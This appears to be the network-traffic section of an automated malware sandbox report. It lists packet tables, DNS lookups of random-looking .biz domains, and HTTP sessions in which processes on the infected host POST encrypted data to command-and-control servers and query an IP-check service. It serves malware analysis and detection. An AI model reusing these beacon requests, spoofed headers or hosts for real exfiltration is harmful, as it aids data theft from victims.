Dec 2, 2024 07:56:23.715461016 CET | 80       | 49740    | 72.52.179.174   | 192.168.2.4
Dec 2, 2024 07:56:23.757112980 CET | 49740    | 80       | 192.168.2.4     | 72.52.179.174
Dec 2, 2024 07:56:24.097749949 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:24.211800098 CET | 80       | 49744    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:24.211805105 CET | 80       | 49744    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:24.211930037 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:24.211963892 CET | 49744    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:24.214426994 CET | 49746    | 80       | 192.168.2.4     | 13.248.148.254
Dec 2, 2024 07:56:24.334537983 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
Dec 2, 2024 07:56:24.334629059 CET | 49746    | 80       | 192.168.2.4     | 13.248.148.254
Dec 2, 2024 07:56:24.334875107 CET | 49746    | 80       | 192.168.2.4     | 13.248.148.254
Dec 2, 2024 07:56:24.454785109 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
Dec 2, 2024 07:56:24.958134890 CET | 49747    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:25.078062057 CET | 80       | 49747    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:25.078141928 CET | 49747    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:25.078569889 CET | 49747    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:25.078569889 CET | 49747    | 80       | 192.168.2.4     | 54.244.188.177
Dec 2, 2024 07:56:25.198487043 CET | 80       | 49747    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:25.198498964 CET | 80       | 49747    | 54.244.188.177  | 192.168.2.4
Dec 2, 2024 07:56:25.649142981 CET | 49749    | 80       | 192.168.2.4     | 193.122.130.0
Dec 2, 2024 07:56:25.686561108 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
Dec 2, 2024 07:56:25.686814070 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
Dec 2, 2024 07:56:25.686840057 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
Dec 2, 2024 07:56:25.686851978 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
Dec 2, 2024 07:56:25.686978102 CET | 80       | 49746    | 13.248.148.254  | 192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.686990023 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687005997 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.687052965 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687072992 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.687172890 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687200069 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687211990 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687226057 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.687841892 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.769021988 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.769506931 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:25.769506931 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:25.807101965 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.807120085 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.807372093 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.888117075 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.888247013 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.888681889 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.889494896 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.892283916 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.944652081 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:26.063066959 CET4974780192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:26.869782925 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:26.989727020 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:26.989809990 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:26.990027905 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:26.990071058 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:27.109927893 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.109951019 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.322065115 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.328289986 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:27.448215008 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.664407015 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.666465044 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:27.666518927 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.666596889 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:27.671411037 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:27.671436071 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.710262060 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:28.929167032 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:28.929243088 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:28.930699110 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:28.930710077 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:28.930974007 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:28.975876093 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:29.024293900 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:29.067342997 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.092554092 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.092667103 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.092752934 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:29.093065023 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:29.212907076 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.382741928 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.382807016 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.382889986 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:29.385936022 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:30.392011881 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.512145996 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:30.512238979 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.512433052 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.512454987 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.632376909 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:30.632390022 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:32.877676010 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:32.877739906 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:32.877789021 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:32.997843027 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.402223110 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.402378082 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.402460098 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.488406897 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.522349119 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.608361959 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.610539913 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.610747099 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.610761881 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.730778933 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.730793953 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:53.298613071 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:53.298697948 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:53.350708008 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:53.470678091 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:14.542939901 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:14.543020010 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:14.543082952 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:14.663042068 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:15.927100897 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.047086000 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:16.047193050 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.047380924 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.047435045 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.167418003 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:16.167561054 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:20.285212040 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:20.285310984 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:57:28.716624022 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:28.718272924 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:57:28.730606079 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:57:28.850518942 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:32.680295944 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:32.680376053 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:57:38.021214962 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.022397995 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.102005959 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.221996069 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.257071018 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.377114058 CET804984082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.377197981 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.377584934 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.377609968 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.497494936 CET804984082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.497509003 CET804984082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:52.304486036 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:52.877566099 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:52.997472048 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:53.000058889 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:53.000236988 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:53.000269890 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:53.120158911 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:53.120177031 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.104959965 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.105030060 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.105107069 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:55.105178118 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:55.225517988 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.289201975 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:57:55.409321070 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.684838057 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.804850101 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.804938078 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.805135965 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.805166006 CET4988180192.168.2.413.251.16.150
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                Dec 2, 2024 07:56:29.340841055 CET1.1.1.1192.168.2.40x41c5Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:29.563549995 CET1.1.1.1192.168.2.40x2917Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:56:30.346731901 CET1.1.1.1192.168.2.40xe321No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:15.831046104 CET1.1.1.1192.168.2.40x3962No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:52.871114016 CET1.1.1.1192.168.2.40xbdf6No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:55.677498102 CET1.1.1.1192.168.2.40xb81cNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:57:58.498339891 CET1.1.1.1192.168.2.40x925fNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:00.513247967 CET1.1.1.1192.168.2.40x90f7No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:03.348413944 CET1.1.1.1192.168.2.40x33f3No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:03.348413944 CET1.1.1.1192.168.2.40x33f3No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:04.922905922 CET1.1.1.1192.168.2.40x6095No error (0)ww99.fwiwk.biz72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:06.764365911 CET1.1.1.1192.168.2.40x307aNo error (0)ww7.fwiwk.biz76899.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                Dec 2, 2024 07:58:06.764365911 CET1.1.1.1192.168.2.40x307aNo error (0)76899.bodis.com199.59.243.227A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 54.244.188.177 | 80 | 7412 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:08.478467941 CET | 347 | OUT | POST /lf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:56:08.478467941 CET | 778 | OUT | Data Raw: 05 3b 8a bc f4 54 ce 81 fe 02 00 00 ac 34 ba a4 96 de ad 57 5c 97 58 19 c7 08 6c a1 8f 55 11 85 f6 1c 8a b1 1c d1 8f 31 c4 44 e6 5f 47 f0 34 2b 99 7f c1 8f 87 0f de 35 5a ba 65 32 31 f7 6b 00 cb 1b 04 a7 19 4d 13 b2 d6 1c 84 04 5a a3 31 8c da be
Data Ascii: ;T4W\XlU1D_G4+5Ze21kMZ1+#$2$b;^KUftf"J x(@-_x4yDV4XF4k6=pJx5,pw\HDIO:.U=Kw)B%uoW;3ls9 .N
Dec 2, 2024 07:56:09.906385899 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:56:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e60876eed7e2d97292ec7b74f8bbb8c4|8.46.123.228|1733122569|1733122569|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 54.244.188.177 | 80 | 7436 | C:\Users\user\AppData\Local\subpredicate\differences.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:08.670545101 CET | 348 | OUT | POST /aah HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 844
Dec 2, 2024 07:56:08.670588970 CET | 844 | OUT | Data Raw: d0 28 c8 26 c0 86 68 50 40 03 00 00 ac 3a 22 df 7d bd f6 b3 8b ea 16 b4 4f 89 50 e0 e7 40 bd 6a fe da 55 1f 36 02 b2 b2 6c 6e 01 3e 1e bd 93 2f 85 f4 fe c4 2a fe ad aa c2 2d 47 a4 16 1b 7e 6e e8 db bf 3c f4 91 cf cd e4 f9 4a 56 9b eb 89 f2 8e 0e
Data Ascii: (&hP@:"}OP@jU6ln>/*-G~n<JVB=$)?o8W.~arvUsjN%4}WM?;Hm=Q1l|Gk~%T|vGL12Df.8kQnF;1VC@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 193.122.130.0 | 80 | 7496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:09.989016056 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 2, 2024 07:56:12.898097038 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 06:56:12 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dacb6d961c26351b574b152a90591817
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 2, 2024 07:56:12.903351068 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 2, 2024 07:56:12.999541044 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 06:56:12 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dacb6d961c26351b574b152a90591817
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 2, 2024 07:56:15.276699066 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 06:56:15 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e5c4bbe1e34a03cf40805e195b63c9da
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49734 | 18.141.10.107 | 80 | 7412 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:10.680054903 CET | 344 | OUT | POST /r HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:56:10.680156946 CET | 778 | OUT | Data Raw: 35 d6 f4 89 33 6a d4 56 fe 02 00 00 08 3d 4d 88 83 79 07 25 a8 a6 19 cf 85 c2 3e 33 ac bb 0d 9e 7e 0d a9 37 16 73 10 bf 18 0c aa 49 28 c2 ad db 22 68 34 20 7b a4 13 57 e9 80 a2 ea 67 09 32 1b e3 1a 50 3c db 28 74 f1 0c 48 e9 3e 8e 8b a1 6f 49 07
Data Ascii: 53jV=My%>3~7sI("h4 {Wg2P<(tH>oI RB,Kv!Hp0X6QB6$ONvQWup7V"m]i4dR7(G f,PA&eE(>~^].bP4e8>`\NT2=l
Dec 2, 2024 07:56:12.898211002 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:56:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f5b364b892e5fbfac0a04485d7c34695|8.46.123.228|1733122572|1733122572|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49735 | 54.244.188.177 | 80 | 7412 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:14.231604099 CET | 355 | OUT | POST /hluumowlkjhsxe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:56:14.231604099 CET | 778 | OUT | Data Raw: 8b ad 46 f0 3d 68 e6 e1 fe 02 00 00 87 a3 5f 25 c5 fe 0a 87 f0 16 e3 a1 5f bd 27 bf 49 cf 48 1c aa d7 bb 83 33 02 59 36 1d 91 74 c5 3d af fa 42 9c 94 4d d0 6f 2f 3d 67 2f 06 47 50 86 40 10 56 82 bd 8c 88 89 f2 99 84 97 d5 ed cb 68 ac 14 8b 5b 4e
Data Ascii: F=h_%_'IH3Y6t=BMo/=g/GP@Vh[N%X018z3am^uShR3:NzHZhtGYbdUa4aR}y:7(YLR>p|1E\Li>
Dec 2, 2024 07:56:15.640903950 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:56:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=72ae9c8f06aa4d3a4b76ae44839b161e|8.46.123.228|1733122575|1733122575|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
5           192.168.2.4  49737        44.221.84.105    80                7412  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 2, 2024 07:56:16.345405102 CET  358  OUT  POST /hwjtljgqnsqgbc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 2, 2024 07:56:16.345429897 CET  778  OUT  Data Raw: f2 3f 38 1d b3 0f cd 90 fe 02 00 00 70 f8 0d a8 d8 46 60 1c 0f 57 02 ca 13 d5 c8 b3 2d ff e8 9b 27 00 16 4d dc d2 2b ce 05 13 d0 b8 66 78 09 cb de f8 17 ae 58 e3 b1 c4 79 2b fe 5c c9 14 bf e4 80 32 b8 4a dd 0b 04 59 71 50 36 bc bc f1 b6 20 5a 08
    Data Ascii: ?8pF`W-'M+fxXy+\2JYqP6 Z Rhebs\3N N81Y%,K,v/08b#J*elqV^+cn aAoi/1$shL?J6T*z4uyWN](n{1JFc({
Dec 2, 2024 07:56:17.491005898 CET  412  IN   HTTP/1.1 200 OK
    Server: nginx
